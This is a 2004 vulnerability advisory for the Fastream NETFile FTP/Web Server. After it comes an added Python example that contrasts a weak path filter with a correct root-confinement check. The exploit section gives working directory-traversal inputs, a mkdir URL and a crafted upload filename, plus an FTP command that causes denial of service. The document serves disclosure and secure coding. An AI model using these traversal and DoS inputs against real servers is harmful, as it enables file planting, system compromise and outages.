Fastream NETFile FTP/Web Server Input Validation Errors
--------------------------------------------------------

Release Date:         4 July 2004
Severity:             High
Systems Affected:     Fastream NETFile FTP/Web Server <= v6.7.2.1085
Systems Not Affected: Fastream NETFile FTP/Web Server v6.7.3
Vendor URL:           http://www.fastream.com/netfileserver.htm
Original Advisory:    http://www.haxorcitos.com/Fastream_advisory.txt
Author:               Andres Tarasco Acuna
email:                at4r @ haxorcitos.com
WEB:                  www.haxorcitos.com

------------------
1. Description
------------------

Vendor's Description:

"Fastream NETFile Server is a secure FTP server and Web server combined
together in one application. Our claim is that it is the easiest to setup
and use server on the Internet!"

"Fastream NETFile FTP Server is a multi-threaded FTP server with virtual
links, quotas, U/D ratio and extremely fast directory and file caches.
Besides being a fast FTP server with full user and group based permissions
and file and directory cache, NETFile Server is also a Web server that is
developed for sharing files. Fastream NETFile Web Server is a web server
with full HTTP 1.1 compatibility with support for multi-part downloads and
keep-alive connections."

-------------------
2. Vulnerability
-------------------

There are several input validation errors in Fastream NETFile that allow
users to bypass the root directory restriction. Because NETFile lets remote
users upload, create and delete files in the application directory, the
flaw is easy to exploit and can lead to a full system compromise.

A second issue lies in the way NETFile handles some URLs: requesting a
specially crafted directory causes a denial of service of about one minute.

-------------------
3. Exploit code
-------------------

The problem is in the way NETFile handles two consecutive slashes.

Example URL:

  http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY

  C:\>dir FOLDE*
   Volume in drive C is W2000P
   Volume Serial Number is xxxx-xxxx

   Directory of C:\

  07/03/2004  07:47p              FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
                 0 File(s)              0 bytes
                 1 Dir(s)  119,015,936 bytes free

NETFile accepts other methods in the "command" parameter that can likewise
be used to create or delete folders and files outside the root directory.

To exploit the file upload path, look at the data sent in the POST request:

  -----------------------------7d42c98700ea
  Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
  Content-Type: text/plain

  THIS IS AN EXAMPLE
  -----------------------------7d42c98700ea--

An attacker can change the filename parameter to something like

  filename="//..//autorun.inf"

and place malicious files anywhere on the system, or overwrite existing
files.

The FTP server does not appear to be affected by this issue and directory
traversal is not possible through it, but another bug lets a malicious user
cause a denial of service with the following command:

  D:\>ftp localhost
  Connected to at4r.intranet.
  220 Fastream NETFile FTP Server Ready
  User (at4r.intranet:(none)): ftp
  331 Password required for ftp.
  Password:
  230 User ftp logged in.
  ftp> cd /////A          <-- here the FTP server hangs for a long time
  599 No such directory.
  ftp>

-----------------
4. Solution
-----------------

The best solution is to upgrade to version 6.7.3, released by the vendor on
3 July 2004.

To reduce the impact of this vulnerability otherwise, place the NETFile root
directory on a separate partition and remove create/delete permissions for
files and directories from all users, including Guest accounts.

-------------------
5. Timeline
-------------------

- 3 July 2004: Vendor contacted.
- 3 July 2004: Issue fixed after 2 hours. New release 6.7.3 available.
- 4 July 2004: Public disclosure.
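The two bypass strings from section 3 ("..//FOLDER..." in the mkdir URL and "//..//autorun.inf" in the upload filename), run through a weak path filter and through a correct confinement check. This is an added example written for this page; it is not code from the original advisory or from NETFile. The root path, the strip-once filter used to illustrate how a "..//" name can survive as an absolute path, and the multipart sample are constructed assumptions; the page does not state how NETFile actually handled the double slash.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed example root (assumption; NETFile's real root is not on the page).
ROOT = "/srv/netfile/root"

# Constructed copy of the multipart part shown in the advisory, with the
# filename an attacker would substitute.
SAMPLE_PART = (
    '-----------------------------7d42c98700ea\r\n'
    'Content-Disposition: form-data; name="upfile"; filename="//..//autorun.inf"\r\n'
    'Content-Type: text/plain\r\n'
    '\r\n'
    'THIS IS AN EXAMPLE\r\n'
    '-----------------------------7d42c98700ea--\r\n'
)


def multipart_filename(part):
    """Pull the client-supplied filename out of a Content-Disposition header."""
    m = re.search(r'filename="([^"]*)"', part)
    return m.group(1) if m else None


def query_filename(url):
    """Pull the filename parameter out of a ?command=...&filename=... URL."""
    values = parse_qs(urlsplit(url).query)
    return values.get("filename", [None])[0]


def weak_join(root, name):
    """Hypothetical weak filter (an assumption, not NETFile's code): strip
    '../' once, then join. '..//X' becomes '/X', and because the second
    operand is now absolute, join() discards the root entirely."""
    return posixpath.normpath(posixpath.join(root, name.replace("../", "")))


def safe_join(root, name):
    """Confine a client-supplied name under root; return None on escape.
    Repeated slashes and dot segments are collapsed by normpath before the
    prefix check, so '..//', '//..//' and '/////' are all handled alike."""
    if "\x00" in name:
        return None
    root = posixpath.normpath(root)
    name = name.replace("\\", "/")  # the affected server ran on Windows
    candidate = posixpath.normpath(posixpath.join(root, name))
    # Compare against root + "/" so /srv/netfile/root2 does not pass as inside.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def upload_target(root, client_filename):
    """For uploads, never honour directory parts of the client's filename
    (browsers once sent full paths such as D:\\foo.txt): keep only the
    basename, then confine it."""
    base = posixpath.basename(client_filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        return None
    return safe_join(root, base)


if __name__ == "__main__":
    mkdir_url = ("http://HOST:PORT/?command=mkdir"
                 "&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY")
    for name in (query_filename(mkdir_url), multipart_filename(SAMPLE_PART),
                 "/////A", "pub/../docs/readme.txt"):
        print(f"{name!r:45} weak={weak_join(ROOT, name)!r:42} "
              f"safe={safe_join(ROOT, name)!r}")
    print("upload:", upload_target(ROOT, multipart_filename(SAMPLE_PART)))
```

Run stand-alone, the script prints both results side by side: the weak filter lands the mkdir name at "/FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY" and the upload name at "/autorun.inf" (the same outcome the advisory's `dir C:\` listing shows, on a POSIX root), while `safe_join` rejects both and also rejects the "/////A" string the FTP DoS used, because it normalises before comparing rather than pattern-matching on the raw text. On a real filesystem the same check should be done on `os.path.realpath` output so that symlinks under the root cannot be used to step out of it.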